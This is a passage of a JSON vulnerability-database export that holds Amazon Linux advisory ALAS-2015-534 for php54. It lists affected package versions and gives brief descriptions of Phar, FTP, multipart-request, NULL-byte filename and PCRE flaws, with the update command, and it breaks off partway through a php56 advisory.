"OSVersion": "any", "packageVersion": "5.4.41-1.69.amzn1", "arch": "x86_64", "packageFilename": "php54-debuginfo-5.4.41-1.69.amzn1.x86_64.rpm", "packageName": "php54-debuginfo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.4.41-1.69.amzn1", "arch": "x86_64", "packageFilename": "php54-enchant-5.4.41-1.69.amzn1.x86_64.rpm", "packageName": "php54-enchant", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.4.41-1.69.amzn1", "arch": "i686", "packageFilename": "php54-pgsql-5.4.41-1.69.amzn1.i686.rpm", "packageName": "php54-pgsql", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.4.41-1.69.amzn1", "arch": "x86_64", "packageFilename": "php54-xmlrpc-5.4.41-1.69.amzn1.x86_64.rpm", "packageName": "php54-xmlrpc", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.4.41-1.69.amzn1", "arch": "i686", "packageFilename": "php54-mcrypt-5.4.41-1.69.amzn1.i686.rpm", "packageName": "php54-mcrypt", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.4.41-1.69.amzn1", "arch": "x86_64", "packageFilename": "php54-xml-5.4.41-1.69.amzn1.x86_64.rpm", "packageName": "php54-xml", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.4.41-1.69.amzn1", "arch": "i686", "packageFilename": "php54-cli-5.4.41-1.69.amzn1.i686.rpm", "packageName": "php54-cli", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.4.41-1.69.amzn1", "arch": "x86_64", "packageFilename": "php54-process-5.4.41-1.69.amzn1.x86_64.rpm", "packageName": "php54-process", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.4.41-1.69.amzn1", "arch": "x86_64", "packageFilename": "php54-common-5.4.41-1.69.amzn1.x86_64.rpm", "packageName": "php54-common", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.4.41-1.69.amzn1", "arch": "i686", "packageFilename": "php54-dba-5.4.41-1.69.amzn1.i686.rpm", "packageName": "php54-dba", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.4.41-1.69.amzn1", "arch": "x86_64", "packageFilename": "php54-mssql-5.4.41-1.69.amzn1.x86_64.rpm", "packageName": "php54-mssql", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.4.41-1.69.amzn1", "arch": "i686", "packageFilename": "php54-mssql-5.4.41-1.69.amzn1.i686.rpm", "packageName": "php54-mssql", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.4.41-1.69.amzn1", "arch": "x86_64", "packageFilename": "php54-recode-5.4.41-1.69.amzn1.x86_64.rpm", "packageName": "php54-recode", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.4.41-1.69.amzn1", "arch": "i686", "packageFilename": "php54-enchant-5.4.41-1.69.amzn1.i686.rpm", "packageName": "php54-enchant", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.4.41-1.69.amzn1", "arch": "i686", "packageFilename": "php54-mysqlnd-5.4.41-1.69.amzn1.i686.rpm", "packageName": "php54-mysqlnd", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.4.41-1.69.amzn1", "arch": "x86_64", "packageFilename": "php54-5.4.41-1.69.amzn1.x86_64.rpm", "packageName": "php54", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.4.41-1.69.amzn1", "arch": "i686", "packageFilename": "php54-common-5.4.41-1.69.amzn1.i686.rpm", "packageName": "php54-common", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.4.41-1.69.amzn1", "arch": "i686", "packageFilename": "php54-ldap-5.4.41-1.69.amzn1.i686.rpm", "packageName": "php54-ldap", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.4.41-1.69.amzn1", "arch": "i686", "packageFilename": "php54-pdo-5.4.41-1.69.amzn1.i686.rpm", "packageName": "php54-pdo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.4.41-1.69.amzn1", "arch": "x86_64", "packageFilename": "php54-embedded-5.4.41-1.69.amzn1.x86_64.rpm", "packageName": "php54-embedded", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.4.41-1.69.amzn1", "arch": "i686", "packageFilename": "php54-soap-5.4.41-1.69.amzn1.i686.rpm", "packageName": "php54-soap", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.4.41-1.69.amzn1", "arch": "i686", "packageFilename": "php54-snmp-5.4.41-1.69.amzn1.i686.rpm", "packageName": "php54-snmp", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.4.41-1.69.amzn1", "arch": "i686", "packageFilename": "php54-embedded-5.4.41-1.69.amzn1.i686.rpm", "packageName": "php54-embedded", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.4.41-1.69.amzn1", "arch": "i686", "packageFilename": "php54-mbstring-5.4.41-1.69.amzn1.i686.rpm", "packageName": "php54-mbstring", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.4.41-1.69.amzn1", "arch": "i686", "packageFilename": "php54-mysql-5.4.41-1.69.amzn1.i686.rpm", "packageName": "php54-mysql", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.4.41-1.69.amzn1", "arch": "x86_64", "packageFilename": "php54-tidy-5.4.41-1.69.amzn1.x86_64.rpm", "packageName": "php54-tidy", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.4.41-1.69.amzn1", "arch": "i686", "packageFilename": "php54-process-5.4.41-1.69.amzn1.i686.rpm", "packageName": "php54-process", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.4.41-1.69.amzn1", "arch": "x86_64", "packageFilename": "php54-imap-5.4.41-1.69.amzn1.x86_64.rpm", "packageName": "php54-imap", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.4.41-1.69.amzn1", "arch": "x86_64", "packageFilename": "php54-devel-5.4.41-1.69.amzn1.x86_64.rpm", "packageName": "php54-devel", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.4.41-1.69.amzn1", "arch": "i686", "packageFilename": "php54-gd-5.4.41-1.69.amzn1.i686.rpm", "packageName": "php54-gd", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.4.41-1.69.amzn1", "arch": "x86_64", "packageFilename": "php54-pspell-5.4.41-1.69.amzn1.x86_64.rpm", "packageName": "php54-pspell", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.4.41-1.69.amzn1", "arch": "x86_64", "packageFilename": "php54-intl-5.4.41-1.69.amzn1.x86_64.rpm", "packageName": "php54-intl", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.4.41-1.69.amzn1", "arch": "x86_64", "packageFilename": "php54-snmp-5.4.41-1.69.amzn1.x86_64.rpm", "packageName": "php54-snmp", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.4.41-1.69.amzn1", "arch": "i686", "packageFilename": "php54-intl-5.4.41-1.69.amzn1.i686.rpm", "packageName": "php54-intl", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.4.41-1.69.amzn1", "arch": "i686", "packageFilename": "php54-bcmath-5.4.41-1.69.amzn1.i686.rpm", "packageName": "php54-bcmath", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.4.41-1.69.amzn1", "arch": "x86_64", "packageFilename": "php54-soap-5.4.41-1.69.amzn1.x86_64.rpm", "packageName": "php54-soap", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.4.41-1.69.amzn1", "arch": "i686", "packageFilename": "php54-xml-5.4.41-1.69.amzn1.i686.rpm", "packageName": "php54-xml", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.4.41-1.69.amzn1", "arch": "i686", "packageFilename": "php54-5.4.41-1.69.amzn1.i686.rpm", "packageName": "php54", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.4.41-1.69.amzn1", "arch": "i686", "packageFilename": "php54-fpm-5.4.41-1.69.amzn1.i686.rpm", "packageName": "php54-fpm", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.4.41-1.69.amzn1", "arch": "x86_64", "packageFilename": "php54-dba-5.4.41-1.69.amzn1.x86_64.rpm", "packageName": "php54-dba", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.4.41-1.69.amzn1", "arch": "i686", "packageFilename": "php54-imap-5.4.41-1.69.amzn1.i686.rpm", "packageName": "php54-imap", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.4.41-1.69.amzn1", "arch": "i686", "packageFilename": "php54-xmlrpc-5.4.41-1.69.amzn1.i686.rpm", "packageName": "php54-xmlrpc", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.4.41-1.69.amzn1", "arch": "x86_64", "packageFilename": "php54-cli-5.4.41-1.69.amzn1.x86_64.rpm", "packageName": "php54-cli", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.4.41-1.69.amzn1", "arch": "x86_64", "packageFilename": "php54-ldap-5.4.41-1.69.amzn1.x86_64.rpm", "packageName": "php54-ldap", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.4.41-1.69.amzn1", "arch": "x86_64", "packageFilename": "php54-mysql-5.4.41-1.69.amzn1.x86_64.rpm", "packageName": "php54-mysql", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.4.41-1.69.amzn1", "arch": "x86_64", "packageFilename": "php54-fpm-5.4.41-1.69.amzn1.x86_64.rpm", "packageName": "php54-fpm", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.4.41-1.69.amzn1", "arch": "x86_64", "packageFilename": "php54-mbstring-5.4.41-1.69.amzn1.x86_64.rpm", "packageName": "php54-mbstring", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.4.41-1.69.amzn1", "arch": "i686", "packageFilename": "php54-recode-5.4.41-1.69.amzn1.i686.rpm", "packageName": "php54-recode", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.4.41-1.69.amzn1", "arch": "x86_64", "packageFilename": "php54-pgsql-5.4.41-1.69.amzn1.x86_64.rpm", "packageName": "php54-pgsql", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.4.41-1.69.amzn1", "arch": "x86_64", "packageFilename": "php54-mcrypt-5.4.41-1.69.amzn1.x86_64.rpm", "packageName": "php54-mcrypt", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.4.41-1.69.amzn1", "arch": "src", "packageFilename": "php54-5.4.41-1.69.amzn1.src.rpm", "packageName": "php54", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.4.41-1.69.amzn1", "arch": "x86_64", "packageFilename": "php54-gd-5.4.41-1.69.amzn1.x86_64.rpm", "packageName": "php54-gd", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.4.41-1.69.amzn1", "arch": "x86_64", "packageFilename": "php54-odbc-5.4.41-1.69.amzn1.x86_64.rpm", "packageName": "php54-odbc", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.4.41-1.69.amzn1", "arch": "i686", "packageFilename": "php54-devel-5.4.41-1.69.amzn1.i686.rpm", "packageName": "php54-devel", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.4.41-1.69.amzn1", "arch": "x86_64", "packageFilename": "php54-bcmath-5.4.41-1.69.amzn1.x86_64.rpm", "packageName": "php54-bcmath", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.4.41-1.69.amzn1", "arch": "i686", "packageFilename": "php54-odbc-5.4.41-1.69.amzn1.i686.rpm", "packageName": "php54-odbc", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.4.41-1.69.amzn1", "arch": "i686", "packageFilename": "php54-pspell-5.4.41-1.69.amzn1.i686.rpm", "packageName": "php54-pspell", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.4.41-1.69.amzn1", "arch": "x86_64", "packageFilename": "php54-mysqlnd-5.4.41-1.69.amzn1.x86_64.rpm", "packageName": "php54-mysqlnd", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.4.41-1.69.amzn1", "arch": "i686", "packageFilename": "php54-debuginfo-5.4.41-1.69.amzn1.i686.rpm", "packageName": "php54-debuginfo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.4.41-1.69.amzn1", "arch": "x86_64", "packageFilename": "php54-pdo-5.4.41-1.69.amzn1.x86_64.rpm", "packageName": "php54-pdo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.4.41-1.69.amzn1", "arch": "i686", "packageFilename": "php54-tidy-5.4.41-1.69.amzn1.i686.rpm", "packageName": "php54-tidy", "operator": "lt"}], "description": "**Issue Overview:**\n\nAn integer underflow flaw leading to out-of-bounds memory access was found in the way PHP's Phar extension parsed Phar archives. A specially crafted archive could cause PHP to crash or, possibly, execute arbitrary code when opened. ([CVE-2015-4021 __](<https://access.redhat.com/security/cve/CVE-2015-4021>))\n\nAn integer overflow flaw leading to a heap based buffer overflow was found in the way PHP's FTP extension parsed file listing FTP server responses. A malicious FTP server could use this flaw to cause a PHP application to crash or, possibly, execute arbitrary code. ([CVE-2015-4022 __](<https://access.redhat.com/security/cve/CVE-2015-4022>))\n\nA flaw was found in the way PHP parsed multipart HTTP POST requests. A specially crafted request could cause PHP to use an excessive amount of CPU time. ([CVE-2015-4024 __](<https://access.redhat.com/security/cve/CVE-2015-4024>))\n\nIt was found that certain PHP functions did not properly handle file names containing a NULL character. A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions. ([CVE-2015-4025 __](<https://access.redhat.com/security/cve/CVE-2015-4025>))\n\nIt was found that certain PHP functions did not properly handle file names containing a NULL character. A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions. ([CVE-2015-4026 __](<https://access.redhat.com/security/cve/CVE-2015-4026>))\n\nPCRE library is prone to a heap overflow vulnerability. Due to insufficient bounds checking inside compile_branch(), the heap memory could be overflowed via a crafted regular expression. Since PCRE library is widely used, this vulnerability should affect many applications using it. An attacker may exploit this issue to execute arbitrary code in the context of the user running the affected application. ([CVE-2015-2325 __](<https://access.redhat.com/security/cve/CVE-2015-2325>))\n\nPCRE library is prone to a vulnerability which leads to Heap overflow. Without enough bound checking inside pcre_compile2(), the heap memory could be overflowed via a crafted regular expression. Since PCRE library is widely used, this vulnerability should affect many applications. An attacker may exploit this issue to execute arbitrary code in the context of the user running the affected application. ([CVE-2015-2326 __](<https://access.redhat.com/security/cve/CVE-2015-2326>))\n\n \n**Affected Packages:** \n\n\nphp54\n\n \n**Issue Correction:** \nRun _yum update php54_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n php54-enchant-5.4.41-1.69.amzn1.i686 \n php54-mssql-5.4.41-1.69.amzn1.i686 \n php54-mbstring-5.4.41-1.69.amzn1.i686 \n php54-pdo-5.4.41-1.69.amzn1.i686 \n php54-gd-5.4.41-1.69.amzn1.i686 \n php54-pgsql-5.4.41-1.69.amzn1.i686 \n php54-mysql-5.4.41-1.69.amzn1.i686 \n php54-odbc-5.4.41-1.69.amzn1.i686 \n php54-soap-5.4.41-1.69.amzn1.i686 \n php54-embedded-5.4.41-1.69.amzn1.i686 \n php54-imap-5.4.41-1.69.amzn1.i686 \n php54-bcmath-5.4.41-1.69.amzn1.i686 \n php54-process-5.4.41-1.69.amzn1.i686 \n php54-recode-5.4.41-1.69.amzn1.i686 \n php54-mysqlnd-5.4.41-1.69.amzn1.i686 \n php54-fpm-5.4.41-1.69.amzn1.i686 \n php54-xmlrpc-5.4.41-1.69.amzn1.i686 \n php54-mcrypt-5.4.41-1.69.amzn1.i686 \n php54-snmp-5.4.41-1.69.amzn1.i686 \n php54-tidy-5.4.41-1.69.amzn1.i686 \n php54-cli-5.4.41-1.69.amzn1.i686 \n php54-intl-5.4.41-1.69.amzn1.i686 \n php54-dba-5.4.41-1.69.amzn1.i686 \n php54-debuginfo-5.4.41-1.69.amzn1.i686 \n php54-ldap-5.4.41-1.69.amzn1.i686 \n php54-xml-5.4.41-1.69.amzn1.i686 \n php54-pspell-5.4.41-1.69.amzn1.i686 \n php54-devel-5.4.41-1.69.amzn1.i686 \n php54-common-5.4.41-1.69.amzn1.i686 \n php54-5.4.41-1.69.amzn1.i686 \n \n src: \n php54-5.4.41-1.69.amzn1.src \n \n x86_64: \n php54-intl-5.4.41-1.69.amzn1.x86_64 \n php54-mysql-5.4.41-1.69.amzn1.x86_64 \n php54-common-5.4.41-1.69.amzn1.x86_64 \n php54-gd-5.4.41-1.69.amzn1.x86_64 \n php54-5.4.41-1.69.amzn1.x86_64 \n php54-tidy-5.4.41-1.69.amzn1.x86_64 \n php54-ldap-5.4.41-1.69.amzn1.x86_64 \n php54-mssql-5.4.41-1.69.amzn1.x86_64 \n php54-imap-5.4.41-1.69.amzn1.x86_64 \n php54-xml-5.4.41-1.69.amzn1.x86_64 \n php54-embedded-5.4.41-1.69.amzn1.x86_64 \n php54-cli-5.4.41-1.69.amzn1.x86_64 \n php54-enchant-5.4.41-1.69.amzn1.x86_64 \n php54-pdo-5.4.41-1.69.amzn1.x86_64 \n php54-odbc-5.4.41-1.69.amzn1.x86_64 \n php54-soap-5.4.41-1.69.amzn1.x86_64 \n php54-pgsql-5.4.41-1.69.amzn1.x86_64 \n php54-pspell-5.4.41-1.69.amzn1.x86_64 \n php54-recode-5.4.41-1.69.amzn1.x86_64 \n php54-mysqlnd-5.4.41-1.69.amzn1.x86_64 \n php54-process-5.4.41-1.69.amzn1.x86_64 \n php54-debuginfo-5.4.41-1.69.amzn1.x86_64 \n php54-xmlrpc-5.4.41-1.69.amzn1.x86_64 \n php54-devel-5.4.41-1.69.amzn1.x86_64 \n php54-fpm-5.4.41-1.69.amzn1.x86_64 \n php54-dba-5.4.41-1.69.amzn1.x86_64 \n php54-bcmath-5.4.41-1.69.amzn1.x86_64 \n php54-mcrypt-5.4.41-1.69.amzn1.x86_64 \n php54-snmp-5.4.41-1.69.amzn1.x86_64 \n php54-mbstring-5.4.41-1.69.amzn1.x86_64 \n \n \n", "edition": 1, "reporter": "Amazon", "published": "2015-06-02T22:33:00", "title": "Important: php54", "type": "amazon", "enchantments": {"score": {"modified": "2018-10-02T16:55:15", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2015-2325", "CVE-2015-4025", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4026", "CVE-2015-4022", "CVE-2015-2326"], "modified": "2015-06-02T22:33:00", "id": "ALAS-2015-534", "href": "https://alas.aws.amazon.com/ALAS-2015-534.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-02T16:55:23", "references": [], "affectedPackage": [{"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.9-1.112.amzn1", "arch": "x86_64", "packageFilename": "php56-gd-5.6.9-1.112.amzn1.x86_64.rpm", "packageName": "php56-gd", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.9-1.112.amzn1", "arch": "x86_64", "packageFilename": "php56-bcmath-5.6.9-1.112.amzn1.x86_64.rpm", "packageName": "php56-bcmath", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.9-1.112.amzn1", "arch": "i686", "packageFilename": "php56-opcache-5.6.9-1.112.amzn1.i686.rpm", "packageName": "php56-opcache", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.9-1.112.amzn1", "arch": "i686", "packageFilename": "php56-process-5.6.9-1.112.amzn1.i686.rpm", "packageName": "php56-process", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.9-1.112.amzn1", "arch": "i686", "packageFilename": "php56-fpm-5.6.9-1.112.amzn1.i686.rpm", "packageName": "php56-fpm", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.9-1.112.amzn1", "arch": "i686", "packageFilename": "php56-mbstring-5.6.9-1.112.amzn1.i686.rpm", "packageName": "php56-mbstring", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.9-1.112.amzn1", "arch": "x86_64", "packageFilename": "php56-5.6.9-1.112.amzn1.x86_64.rpm", "packageName": "php56", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.9-1.112.amzn1", "arch": "i686", "packageFilename": "php56-bcmath-5.6.9-1.112.amzn1.i686.rpm", "packageName": "php56-bcmath", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.9-1.112.amzn1", "arch": "x86_64", "packageFilename": "php56-embedded-5.6.9-1.112.amzn1.x86_64.rpm", "packageName": "php56-embedded", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.9-1.112.amzn1", "arch": "i686", "packageFilename": "php56-gmp-5.6.9-1.112.amzn1.i686.rpm", "packageName": "php56-gmp", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.9-1.112.amzn1", "arch": "x86_64", "packageFilename": "php56-debuginfo-5.6.9-1.112.amzn1.x86_64.rpm", "packageName": "php56-debuginfo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.9-1.112.amzn1", "arch": "x86_64", "packageFilename": "php56-gmp-5.6.9-1.112.amzn1.x86_64.rpm", "packageName": "php56-gmp", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.9-1.112.amzn1", "arch": "i686", "packageFilename": "php56-intl-5.6.9-1.112.amzn1.i686.rpm", "packageName": "php56-intl", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.9-1.112.amzn1", "arch": "i686", "packageFilename": "php56-cli-5.6.9-1.112.amzn1.i686.rpm", "packageName": "php56-cli", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.9-1.112.amzn1", "arch": "i686", "packageFilename": "php56-xmlrpc-5.6.9-1.112.amzn1.i686.rpm", "packageName": "php56-xmlrpc", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.9-1.112.amzn1", "arch": "i686", "packageFilename": "php56-pgsql-5.6.9-1.112.amzn1.i686.rpm", "packageName": "php56-pgsql", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.9-1.112.amzn1", "arch": "x86_64", "packageFilename": "php56-dbg-5.6.9-1.112.amzn1.x86_64.rpm", "packageName": "php56-dbg", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.9-1.112.amzn1", "arch": "i686", "packageFilename": "php56-mcrypt-5.6.9-1.112.amzn1.i686.rpm", "packageName": "php56-mcrypt", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.9-1.112.amzn1", "arch": "x86_64", "packageFilename": "php56-ldap-5.6.9-1.112.amzn1.x86_64.rpm", "packageName": "php56-ldap", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.9-1.112.amzn1", "arch": "x86_64", "packageFilename": "php56-fpm-5.6.9-1.112.amzn1.x86_64.rpm", "packageName": "php56-fpm", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.9-1.112.amzn1", "arch": "src", "packageFilename": "php56-5.6.9-1.112.amzn1.src.rpm", "packageName": "php56", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.9-1.112.amzn1", "arch": "x86_64", "packageFilename": "php56-pdo-5.6.9-1.112.amzn1.x86_64.rpm", "packageName": "php56-pdo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.9-1.112.amzn1", "arch": "x86_64", "packageFilename": "php56-mbstring-5.6.9-1.112.amzn1.x86_64.rpm", "packageName": "php56-mbstring", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.9-1.112.amzn1", "arch": "i686", "packageFilename": "php56-common-5.6.9-1.112.amzn1.i686.rpm", "packageName": "php56-common", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.9-1.112.amzn1", "arch": "i686", "packageFilename": "php56-dbg-5.6.9-1.112.amzn1.i686.rpm", "packageName": "php56-dbg", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.9-1.112.amzn1", "arch": "i686", "packageFilename": "php56-ldap-5.6.9-1.112.amzn1.i686.rpm", "packageName": "php56-ldap", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.9-1.112.amzn1", "arch": "x86_64", "packageFilename": "php56-soap-5.6.9-1.112.amzn1.x86_64.rpm", "packageName": "php56-soap", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.9-1.112.amzn1", "arch": "x86_64", "packageFilename": "php56-devel-5.6.9-1.112.amzn1.x86_64.rpm", "packageName": "php56-devel", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.9-1.112.amzn1", "arch": "i686", "packageFilename": "php56-gd-5.6.9-1.112.amzn1.i686.rpm", "packageName": "php56-gd", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.9-1.112.amzn1", "arch": "x86_64", "packageFilename": "php56-xmlrpc-5.6.9-1.112.amzn1.x86_64.rpm", "packageName": "php56-xmlrpc", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.9-1.112.amzn1", "arch": "x86_64", "packageFilename": "php56-cli-5.6.9-1.112.amzn1.x86_64.rpm", "packageName": "php56-cli", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.9-1.112.amzn1", "arch": "i686", "packageFilename": "php56-mysqlnd-5.6.9-1.112.amzn1.i686.rpm", "packageName": "php56-mysqlnd", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.9-1.112.amzn1", "arch": "i686", "packageFilename": "php56-dba-5.6.9-1.112.amzn1.i686.rpm", "packageName": "php56-dba", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.9-1.112.amzn1", "arch": "i686", "packageFilename": "php56-tidy-5.6.9-1.112.amzn1.i686.rpm", "packageName": "php56-tidy", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.9-1.112.amzn1", "arch": "x86_64", "packageFilename": "php56-odbc-5.6.9-1.112.amzn1.x86_64.rpm", "packageName": "php56-odbc", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.9-1.112.amzn1", "arch": "i686", "packageFilename": "php56-devel-5.6.9-1.112.amzn1.i686.rpm", "packageName": "php56-devel", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.9-1.112.amzn1", "arch": "i686", "packageFilename": "php56-pdo-5.6.9-1.112.amzn1.i686.rpm", "packageName": "php56-pdo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.9-1.112.amzn1", "arch": "x86_64", "packageFilename": "php56-recode-5.6.9-1.112.amzn1.x86_64.rpm", "packageName": "php56-recode", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.9-1.112.amzn1", "arch": "x86_64", "packageFilename": "php56-imap-5.6.9-1.112.amzn1.x86_64.rpm", "packageName": "php56-imap", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.9-1.112.amzn1", "arch": "x86_64", "packageFilename": "php56-pspell-5.6.9-1.112.amzn1.x86_64.rpm", "packageName": "php56-pspell", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.6.9-1.112.amzn1", "arch": "x86_64", "packageFilename": "php56-xml-5.6.9-1.112.amzn1.x86_64.rpm", "packageName": "php56-xml", "operator": "lt"}, {"OS": "Amazon Linux", 